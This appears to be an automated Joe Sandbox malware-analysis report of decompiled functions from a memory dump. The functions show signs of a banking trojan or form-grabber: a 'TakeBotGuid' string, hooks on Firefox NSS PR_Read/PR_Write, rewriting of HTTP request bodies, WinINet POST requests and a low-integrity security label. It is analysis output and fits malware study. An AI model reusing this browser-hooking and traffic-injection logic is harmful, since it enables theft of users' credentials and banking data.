Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: AddressProc$LibraryLoad$CreateThread
String ID: .dat$Start$TakeBotGuid
API String ID: 2597769491-2828610659
Opcode ID: 310e0c152d5da7a0b19c4bf47972c06e166e51ab3e462f7fcdbfea41c0d430ef
Instruction ID: 550d53b3346e4f77aad25b36c1a4238f44f39af4c6e7829ff6fab87b37f339fd
Opcode Fuzzy Hash: 310e0c152d5da7a0b19c4bf47972c06e166e51ab3e462f7fcdbfea41c0d430ef
Instruction Fuzzy Hash: 3851B030A20256DFDB28EF74FCE49FD3BA6EF54390B10062DE52597295DB348965CB80

Uniqueness

Uniqueness Score: -1.00%

Function 012CE62B Relevance: 15.1, APIs: 10, Instructions: 103
synchronizationwindowthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012CE62B(void* __eax, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
				char _v5;
				signed char _v12;
				struct tagRECT _v28;
				void* __esi;
				signed char _t39;
				char _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				RECT* _t80;
				void* _t81;

				_t80 = __edi;
				_t81 = __eax;
				_t39 = L012B1956(_a4) & 0x0000ffff;
				_v12 = _t39;
				if((_t39 & 0x00000001) == 0) {
					_t40 = L012B11CC(_t81, _a4);
					_v5 = _t40;
					if(_t40 == 0 || (_v12 & 0x00000010) != 0) {
						L6:
						if(E012CE4CE(_t81) == 0) {
							L12:
							_t42 = _a8;
							if(( *(_t42 + 0x24) & 0x40000000) == 0) {
								IntersectRect( &_v28, _t42 + 4, _t80);
								FillRect( *(_t81 + 0x154),  &_v28, 6);
								DrawEdge( *(_t81 + 0x154),  &_v28, 0xa, 0xf);
							}
							goto L14;
						}
						L012B1947( *((intOrPtr*)(_t81 + 0x10)) + 0x114, _t80, 0x10);
						ResetEvent( *(_t81 + 0xc));
						if(PostThreadMessageW( *(_t81 + 0x188),  *(_t81 + 8), 0xfffffffc, _a4) == 0) {
							goto L12;
						}
						if(WaitForSingleObject( *(_t81 + 0xc), 0x3e8) != 0) {
							TerminateProcess( *(_t81 + 0x17c), 0);
							L012B11D1(_t81 + 0x17c);
							goto L12;
						}
						if( *((char*)( *((intOrPtr*)(_t81 + 0x10)) + 0x124)) != 1) {
							goto L12;
						}
						_t43 = _v5;
						goto L15;
					} else {
						ResetEvent( *(_t81 + 0xc));
						if(PostMessageW(_a4,  *(_t81 + 8), (__edi->top & 0x0000ffff) << 0x00000010 |  *__edi & 0x0000ffff, (__edi->bottom & 0x0000ffff) << 0x00000010 | __edi->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t81 + 0xc), 0x64) != 0) {
							goto L6;
						} else {
							L14:
							_t43 = 1;
							L15:
							return _t43;
						}
					}
				}
				return 1;
			}

0x012ce62b
0x012ce635
0x012ce63c
0x012ce63f
0x012ce644
0x012ce653
0x012ce65e
0x012ce663
0x012ce6ae
0x012ce6b5
0x012ce721
0x012ce721
0x012ce72b
0x012ce736
0x012ce748
0x012ce75c
0x012ce75c
0x00000000
0x012ce72b
0x012ce6c3
0x012ce6cb
0x012ce6e3
0x00000000
0x00000000
0x012ce6f5
0x012ce710
0x012ce71c
0x00000000
0x012ce71c
0x012ce701
0x00000000
0x00000000
0x012ce703
0x00000000
0x012ce66b
0x012ce66e
0x012ce699
0x00000000
0x012ce762
0x012ce762
0x012ce762
0x012ce764
0x00000000
0x012ce764
0x012ce699
0x012ce663
0x00000000

APIs

ResetEvent.KERNEL32(?), ref: 012CE66E
PostMessageW.USER32(00000010,00000010,?,?), ref: 012CE691
WaitForSingleObject.KERNEL32(?,00000064), ref: 012CE6A0
ResetEvent.KERNEL32(?,?,?,00000010), ref: 012CE6CB
PostThreadMessageW.USER32 ref: 012CE6DB
WaitForSingleObject.KERNEL32(?,000003E8,?,00000010), ref: 012CE6ED

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: EventMessageObjectPostResetSingleWait$Thread
String ID:
API String ID: 4051138640-0
Opcode ID: 7317ac2121bd365f5fe53174cee0369d36d4785ea00484300e03265c62c5e07b
Instruction ID: 6dd385ce9ffa798457ca3c4bbc4d0af2606bd71d5ef54d2d2adb1fc4569b9db8
Opcode Fuzzy Hash: 7317ac2121bd365f5fe53174cee0369d36d4785ea00484300e03265c62c5e07b
Instruction Fuzzy Hash: 4631E330510206AFEB215F68ED48FEA7FB8BF04B04F114618FB9ADA191DB31E855DB50

Uniqueness

Uniqueness Score: -1.00%

Function 012B5228 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67
networkCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E012B5228(void* __ecx, char* __edx, long _a4, void* _a8, long _a12, void _a16) {
				char* _t17;
				char* _t20;
				signed int _t28;
				void* _t29;
				char* _t31;
				long _t32;
				void* _t33;

				_t31 = __edx;
				_t29 = __ecx;
				_t28 = _a16 & 0x00000002;
				_t32 = 0x8404f700;
				if(_t28 != 0) {
					_t32 = 0x8444f700;
				}
				if((_a16 & 0x00000004) != 0) {
					_t32 = _t32 | 0x00800000;
				}
				_t17 = "POST";
				if((_a16 & 0x00000001) == 0) {
					_t17 = "GET";
				}
				_t33 = HttpOpenRequestA(_t29, _t17, _t31, "HTTP/1.1", _a4, 0x12db000, _t32, 0);
				if(_t33 == 0) {
					L15:
					return 0;
				} else {
					if(_t28 == 0) {
						_push(0x13);
						_t20 = "Connection: close\r\n";
						_pop(0);
					} else {
						_t20 = 0;
					}
					if(HttpSendRequestA(_t33, _t20, 0, _a8, _a12) == 0) {
						L14:
						InternetCloseHandle(_t33);
						goto L15;
					} else {
						_a16 = _a16 & 0x00000000;
						_a4 = 4;
						if(HttpQueryInfoA(_t33, 0x20000013,  &_a16,  &_a4, 0) == 0 || _a16 != 0xc8) {
							goto L14;
						} else {
							return _t33;
						}
					}
				}
			}

0x012b5228
0x012b5228
0x012b522f
0x012b5233
0x012b5238
0x012b523a
0x012b523a
0x012b5243
0x012b5245
0x012b5245
0x012b524f
0x012b5254
0x012b5256
0x012b5256
0x012b5274
0x012b5278
0x012b52d8
0x00000000
0x012b527a
0x012b527c
0x012b5284
0x012b5286
0x012b528b
0x012b527e
0x012b527e
0x012b5280
0x012b529d
0x012b52d1
0x012b52d2
0x00000000
0x012b529f
0x012b529f
0x012b52b3
0x012b52c2
0x00000000
0x012b52cd
0x00000000
0x012b52cd
0x012b52c2
0x012b529d

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,012DB000,8404F700,00000000), ref: 012B526E
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 012B5295
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 012B52BA
InternetCloseHandle.WININET(00000000), ref: 012B52D2

Strings

GET, xrefs: 012B5256
Connection: close, xrefs: 012B5286, 012B5293
HTTP/1.1, xrefs: 012B5266
POST, xrefs: 012B524F, 012B526C

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
String ID: Connection: close$GET$HTTP/1.1$POST
API String ID: 3080274660-1621676011
Opcode ID: 897be0cb475928f9e8750c3838cac4a6c865fc88ad30f0ca1a37081ec188317c
Instruction ID: 858663c9926f2d35c2599906a99ca9b127b576aba08e0236d0149b9dacd1ad85
Opcode Fuzzy Hash: 897be0cb475928f9e8750c3838cac4a6c865fc88ad30f0ca1a37081ec188317c
Instruction Fuzzy Hash: 6F11B23162221A6FFB218EA8ED89FEB3A5CAF05764F144015FF01EA180D7B4D91087A4

Uniqueness

Uniqueness Score: -1.00%

Function 012B178F Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B178F(struct HINSTANCE__* __ecx) {
				void* __ebx;
				_Unknown_base(*)()* _t4;
				void* _t8;
				void* _t9;
				intOrPtr _t12;
				struct HINSTANCE__* _t13;

				_t13 = __ecx;
				 *0x12db378 = GetProcAddress(__ecx, "PR_OpenTCPSocket");
				 *0x12db388 = GetProcAddress(_t13, "PR_Close");
				 *0x12db398 = GetProcAddress(_t13, "PR_Read");
				_t4 = GetProcAddress(_t13, "PR_Write");
				_t8 = 4;
				 *0x12db3a8 = _t4;
				_t9 = E012CFC35(_t8, 0xffffffff, 0x12db378, _t8);
				if(_t9 != 0) {
					_t12 =  *0x12db380; // 0x0
					E012B1352(_t13, _t12,  *0x12db390,  *0x12db3a0,  *0x12db3b0);
				}
				return _t9;
			}

0x012cff66
0x012cff76
0x012cff83
0x012cff90
0x012cff95
0x012cff99
0x012cffa2
0x012cffac
0x012cffb0
0x012cffb8
0x012cffcc
0x012cffcc
0x012cffd6

APIs

GetProcAddress.KERNEL32(?,PR_OpenTCPSocket), ref: 012CFF6E
GetProcAddress.KERNEL32(?,PR_Close), ref: 012CFF7B
GetProcAddress.KERNEL32(?,PR_Read), ref: 012CFF88
GetProcAddress.KERNEL32(?,PR_Write), ref: 012CFF95

Part of subcall function 012B1352: InitializeCriticalSection.KERNEL32(012DD2E4), ref: 012C681D
Part of subcall function 012B1352: GetProcAddress.KERNEL32(?,PR_GetNameForIdentity), ref: 012C6856
Part of subcall function 012B1352: GetProcAddress.KERNEL32(PR_SetError), ref: 012C6868
Part of subcall function 012B1352: GetProcAddress.KERNEL32(PR_GetError), ref: 012C687A

Strings

PR_OpenTCPSocket, xrefs: 012CFF68
PR_Read, xrefs: 012CFF7D
PR_Close, xrefs: 012CFF70
PR_Write, xrefs: 012CFF8A

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: AddressProc$CriticalInitializeSection
String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
API String ID: 2804437462-3954199073
Opcode ID: 73a1b555a14a0458211a526f6c0913049c5f2f93df6955e78ac91e11fcc2d50d
Instruction ID: e2e195648609c0d96450e968f006a70549136224732198d4f28a85d7f2aacbea
Opcode Fuzzy Hash: 73a1b555a14a0458211a526f6c0913049c5f2f93df6955e78ac91e11fcc2d50d
Instruction Fuzzy Hash: 55F0A471EA23157BCB705B26FC99C663F69EB939A0325011FF90457158CDB14400AB50

Uniqueness

Uniqueness Score: -1.00%

Function 012C6FE0 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 240
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E012C6FE0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v12;
				void* _v16;
				signed int _v20;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t104;
				signed int _t106;
				signed int _t117;
				signed int _t119;
				void* _t139;
				void* _t146;
				struct _CRITICAL_SECTION* _t152;
				intOrPtr _t154;
				void* _t169;
				void* _t174;
				char* _t180;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				void* _t192;
				intOrPtr _t196;
				intOrPtr _t198;
				signed int _t199;
				signed int _t201;
				signed int _t202;

				_t104 = L012B150A();
				_t196 = _a4;
				if(_t104 == 0 || _a8 == 0 || _a12 <= 0) {
					L41:
					return  *0x12dd308(_t196, _a8, _a12);
				} else {
					_t152 = 0x12dd2e4;
					EnterCriticalSection(0x12dd2e4);
					_t106 = E012C63A9(_t196);
					if(_t106 == 0xffffffff) {
						L40:
						LeaveCriticalSection(_t152);
						goto L41;
					}
					_t186 = _t106 * 0x38 +  *0x12dd300;
					if( *((intOrPtr*)(_t186 + 0x30)) > 0) {
						L31:
						_t198 =  *((intOrPtr*)(_t186 + 0x30)) -  *((intOrPtr*)(_t186 + 0x34));
						__eflags = _a12 - _t198;
						if(_a12 < _t198) {
							_t198 = _a12;
						}
						_t90 = _t186 + 0x2c; // -19780308
						_v20 = _t90;
						L012B1947(_a8,  *_t90 +  *((intOrPtr*)(_t186 + 0x34)), _t198);
						 *((intOrPtr*)(_t186 + 0x34)) =  *((intOrPtr*)(_t186 + 0x34)) + _t198;
						__eflags =  *((intOrPtr*)(_t186 + 0x34)) -  *((intOrPtr*)(_t186 + 0x30));
						if( *((intOrPtr*)(_t186 + 0x34)) ==  *((intOrPtr*)(_t186 + 0x30))) {
							L012B1933( *_v20);
							_t174 = 0xc;
							L012B19F6(_v20, _t174);
						}
						LeaveCriticalSection(_t152);
						return _t198;
					}
					if( *((intOrPtr*)(_t186 + 0x10)) <= 0) {
						goto L40;
					}
					LeaveCriticalSection(0x12dd2e4);
					_t117 =  *0x12dd308(_t196, _a8, _a12);
					_v8 = _t117;
					if(_t117 <= 0xffffffff) {
						L39:
						return _v8;
					}
					EnterCriticalSection(0x12dd2e4);
					_t119 = E012C63A9(_t196);
					_t188 = _t119;
					if(_t188 == 0xffffffff) {
						L36:
						_push(8);
						_push(0xffffe890);
						L37:
						 *0x12dd2e0();
						_v8 = _v8 | 0xffffffff;
						L38:
						LeaveCriticalSection(_t152);
						goto L39;
					}
					_t199 = _v8;
					if(_t199 == 0) {
						L10:
						_t190 = _t188 * 0x38 +  *0x12dd300;
						_v20 = _t190;
						if(_t199 > 0) {
							L012B1947( *((intOrPtr*)(_t190 + 0x14)) +  *((intOrPtr*)(_t190 + 0x18)), _a8, _t199);
							 *((intOrPtr*)(_t190 + 0x18)) =  *((intOrPtr*)(_t190 + 0x18)) + _t199;
						}
						_t201 = E012C6C46(_t155,  &_v48,  *((intOrPtr*)(_t190 + 0x14)),  *((intOrPtr*)(_t190 + 0x18)));
						if(_t201 == 1) {
							_t201 = E012C6E00( *((intOrPtr*)(_t190 + 0x14)),  *((intOrPtr*)(_t190 + 0x18)),  &_v48, ( &_v16 & 0xffffff00 | _v8 == 0x00000000) & 0x000000ff,  &_v16,  &_v12);
							if(_t201 == 1) {
								_t202 = _v20;
								_push( *((intOrPtr*)(_t202 + 0x10)));
								_push( *((intOrPtr*)(_t202 + 0xc)));
								_push( &_v12);
								if(L012B17EE( *((intOrPtr*)(_t202 + 4)),  &_v16) != 0) {
									_t154 = L012B1C17( *((intOrPtr*)(_t202 + 0x18)) - _v36 + _v40 + _v12 + 0x14);
									if(_t154 != 0) {
										L012B1947(_t154,  *((intOrPtr*)(_t202 + 0x14)), _v40);
										if((_v48 & 0x00000002) == 0) {
											L012B182F(_v12,  &_v32, 0xa, 0);
											_t139 = L012B195B(_t154, _v40, "Content-Length",  &_v32);
											_push(_v12);
											_t180 = _v16;
											_t169 = _t154 + _t139;
										} else {
											_t146 = L012B10A0(L012B1BA9(_v40 + _t154, 0xd, "%x\r\n", _v12) + _v40 + _t154, _v16, _v12);
											_push(7);
											_t180 = "\r\n0\r\n\r\n";
											_t169 = _t146;
										}
										_t192 = L012B10A0(_t169, _t180);
										_t141 =  *((intOrPtr*)(_t202 + 0x18));
										if(_v36 !=  *((intOrPtr*)(_t202 + 0x18))) {
											_t192 = L012B10A0(_t192,  *((intOrPtr*)(_t202 + 0x14)) + _v36, _t141 - _v36);
										}
										L012B1933( *((intOrPtr*)(_t202 + 0x14)));
										 *((intOrPtr*)(_t202 + 0x14)) = _t154;
										 *((intOrPtr*)(_t202 + 0x18)) = _t192 - _t154;
									}
								}
								_t201 = _t202 | 0xffffffff;
								L012B1933(_v16);
							}
							_t190 = _v20;
							_t152 = 0x12dd2e4;
						}
						if(_v8 <= 0) {
							L28:
							if(__eflags == 0) {
								L30:
								 *((intOrPtr*)(_t190 + 0x2c)) =  *((intOrPtr*)(_t190 + 0x14));
								 *((intOrPtr*)(_t190 + 0x30)) =  *((intOrPtr*)(_t190 + 0x18));
								 *((intOrPtr*)(_t190 + 0x34)) = 0;
								 *((intOrPtr*)(_t190 + 0x14)) = 0;
								 *((intOrPtr*)(_t190 + 0x18)) = 0;
								L012B1A64( *(_t190 + 0xc),  *(_t190 + 0x10));
								 *(_t190 + 0x10) =  *(_t190 + 0x10) & 0x00000000;
								_t83 = _t190 + 0xc;
								 *_t83 =  *(_t190 + 0xc) & 0x00000000;
								__eflags =  *_t83;
								_t186 = _v20;
								goto L31;
							}
							__eflags = _t201 - 0xffffffff;
							if(_t201 != 0xffffffff) {
								goto L38;
							}
							goto L30;
						} else {
							if(_t201 != 0) {
								__eflags = _v8;
								goto L28;
							}
							_push(0);
							_push(0xffffe892);
							goto L37;
						}
					}
					_t13 =  *0x12dd300 + 0x14; // 0x14
					_t155 = _t119 * 0x38 + _t13;
					if(L012B1C26(_t119 * 0x38 + _t13,  *((intOrPtr*)(_t119 * 0x38 +  *0x12dd300 + 0x18)) + _t199) == 0) {
						goto L36;
					}
					goto L10;
				}
			}

0x012c6fe9
0x012c6fee
0x012c6ff3
0x012c72c3
0x00000000
0x012c700d
0x012c700d
0x012c7013
0x012c7019
0x012c7021
0x012c72bc
0x012c72bd
0x00000000
0x012c72bd
0x012c7030
0x012c7036
0x012c7250
0x012c7253
0x012c7256
0x012c7259
0x012c725b
0x012c725b
0x012c725e
0x012c7261
0x012c726e
0x012c7273
0x012c7279
0x012c727c
0x012c7283
0x012c728a
0x012c728d
0x012c728d
0x012c7293
0x00000000
0x012c7299
0x012c7040
0x00000000
0x00000000
0x012c7047
0x012c7054
0x012c705d
0x012c7063
0x012c72b7
0x00000000
0x012c72b7
0x012c706a
0x012c7070
0x012c7075
0x012c707a
0x012c729d
0x012c729d
0x012c729f
0x012c72a4
0x012c72a4
0x012c72aa
0x012c72b0
0x012c72b1
0x00000000
0x012c72b1
0x012c7080
0x012c7085
0x012c70a7
0x012c70aa
0x012c70b0
0x012c70b5
0x012c70c2
0x012c70c7
0x012c70c7
0x012c70d8
0x012c70dd
0x012c7104
0x012c7109
0x012c710f
0x012c7112
0x012c7118
0x012c711e
0x012c7129
0x012c7144
0x012c7148
0x012c7155
0x012c715e
0x012c719b
0x012c71ae
0x012c71b3
0x012c71b6
0x012c71b9
0x012c7160
0x012c7181
0x012c7186
0x012c7188
0x012c718d
0x012c718d
0x012c71c1
0x012c71c3
0x012c71c9
0x012c71dc
0x012c71dc
0x012c71e1
0x012c71e8
0x012c71eb
0x012c71eb
0x012c7148
0x012c71f1
0x012c71f4
0x012c71f4
0x012c71f9
0x012c71fc
0x012c71fc
0x012c7206
0x012c721a
0x012c721a
0x012c7225
0x012c722b
0x012c7231
0x012c7237
0x012c723a
0x012c723d
0x012c7240
0x012c7245
0x012c7249
0x012c7249
0x012c7249
0x012c724d
0x00000000
0x012c724d
0x012c721c
0x012c721f
0x00000000
0x00000000
0x00000000
0x012c7208
0x012c720a
0x012c7217
0x00000000
0x012c7217
0x012c720c
0x012c720d
0x00000000
0x012c720d
0x012c7206
0x012c7096
0x012c7096
0x012c70a1
0x00000000
0x00000000
0x00000000
0x012c70a1

APIs

EnterCriticalSection.KERNEL32(012DD2E4), ref: 012C7013
LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C7047
EnterCriticalSection.KERNEL32(012DD2E4), ref: 012C706A
LeaveCriticalSection.KERNEL32(012DD2E4,00000000,?,?), ref: 012C7293
LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C72B1
LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C72BD

Strings

Content-Length, xrefs: 012C71A7
0, xrefs: 012C7188
%x, xrefs: 012C7166

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CriticalSection$Leave$Enter
String ID: 0$%x$Content-Length
API String ID: 2978645861-3838797520
Opcode ID: f56b17ab83faa68ddce2a00577a03754d2da51b23ff4fb8e45e33c18f4629a73
Instruction ID: ec2bbb2529783f2314a5aa526f6175b9be630cc89f08078e65bb01889b06b983
Opcode Fuzzy Hash: f56b17ab83faa68ddce2a00577a03754d2da51b23ff4fb8e45e33c18f4629a73
Instruction Fuzzy Hash: E691E232D1060AEFCF10DFA8D984AADB7B6FF54710F104618EA11A7291DB30EA65CF91

Uniqueness

Uniqueness Score: -1.00%

Function 012B7056 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E012B7056(void* __ecx, void* __edx, struct _ACL* _a4) {
				char _v5;
				struct _SECURITY_DESCRIPTOR* _v12;
				int _v16;
				int _v20;
				char* _t14;
				int _t19;
				void* _t27;
				void* _t28;

				_t28 = __edx;
				_t27 = __ecx;
				_v5 = 0;
				L012B19C9(L"SeSecurityPrivilege", 1);
				_t14 = L"S:(ML;CIOI;NRNWNX;;;LW)";
				if(_a4 == 0) {
					_t14 = L"S:(ML;;NRNWNX;;;LW)";
				}
				_push(0);
				_push( &_v12);
				_push(1);
				_push(_t14);
				L012D23E8();
				if(_t14 != 0) {
					_a4 = 0;
					_t19 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_a4,  &_v16);
					if(_t19 != 0) {
						__imp__SetNamedSecurityInfoW(_t27, _t28, 0x10, 0, 0, 0, _a4);
						if(_t19 == 0) {
							_v5 = 1;
						}
					}
					LocalFree(_v12);
				}
				return _v5;
			}

0x012b705f
0x012b7061
0x012b706c
0x012b706f
0x012b7074
0x012b707c
0x012b707e
0x012b707e
0x012b7083
0x012b7087
0x012b7088
0x012b708a
0x012b708b
0x012b7092
0x012b70a3
0x012b70a6
0x012b70ae
0x012b70ba
0x012b70c2
0x012b70c4
0x012b70c4
0x012b70c2
0x012b70cb
0x012b70cb
0x012b70d8

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 012B708B
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 012B70A6
SetNamedSecurityInfoW.ADVAPI32(?,?,00000010,00000000,00000000,00000000,?), ref: 012B70BA
LocalFree.KERNEL32(?), ref: 012B70CB

Strings

SeSecurityPrivilege, xrefs: 012B7067
S:(ML;CIOI;NRNWNX;;;LW), xrefs: 012B7074
S:(ML;;NRNWNX;;;LW), xrefs: 012B707E, 012B708A

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Security$Descriptor$ConvertFreeInfoLocalNamedSaclString
String ID: S:(ML;;NRNWNX;;;LW)$S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
API String ID: 173816248-2010866413
Opcode ID: dba9fa947e12f735767e90c065200a199269594e2a623f39587c5f8920a6ac94
Instruction ID: b91506ada377b11f62f68f6e615eb162f6719a380f2807f96c65561106a83ce2
Opcode Fuzzy Hash: dba9fa947e12f735767e90c065200a199269594e2a623f39587c5f8920a6ac94
Instruction Fuzzy Hash: 2901D6759142497BDB119BA8DCC8EEF7F6CEF45384F004466FA41A7180D67299488760

Uniqueness

Uniqueness Score: -1.00%

Function 012B1352 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B1352(struct HINSTANCE__* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				_Unknown_base(*)()* _t9;
				intOrPtr _t13;
				struct HINSTANCE__* _t16;

				 *0x12dd300 =  *0x12dd300 & 0x00000000;
				 *0x12dd304 =  *0x12dd304 & 0x00000000;
				_t13 = __edx;
				_t16 = __ecx;
				InitializeCriticalSection(0x12dd2e4);
				 *0x12dd2d8 = _a4;
				 *0x12dd308 = _a8;
				 *0x12dd2dc = _t16;
				 *0x12dd2fc = _t13;
				 *0x12dd2d4 = _a12;
				 *0x12dd2d0 = GetProcAddress(_t16, "PR_GetNameForIdentity");
				 *0x12dd2e0 = GetProcAddress( *0x12dd2dc, "PR_SetError");
				_t9 = GetProcAddress( *0x12dd2dc, "PR_GetError");
				 *0x12dd2cc = _t9;
				return _t9;
			}

0x012c6804
0x012c680b
0x012c6819
0x012c681b
0x012c681d
0x012c6827
0x012c6835
0x012c683e
0x012c684b
0x012c6851
0x012c6863
0x012c6875
0x012c687a
0x012c687d
0x012c6883

APIs

InitializeCriticalSection.KERNEL32(012DD2E4), ref: 012C681D
GetProcAddress.KERNEL32(?,PR_GetNameForIdentity), ref: 012C6856
GetProcAddress.KERNEL32(PR_SetError), ref: 012C6868
GetProcAddress.KERNEL32(PR_GetError), ref: 012C687A

Strings

PR_GetNameForIdentity, xrefs: 012C6830
PR_SetError, xrefs: 012C6858
PR_GetError, xrefs: 012C686A

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
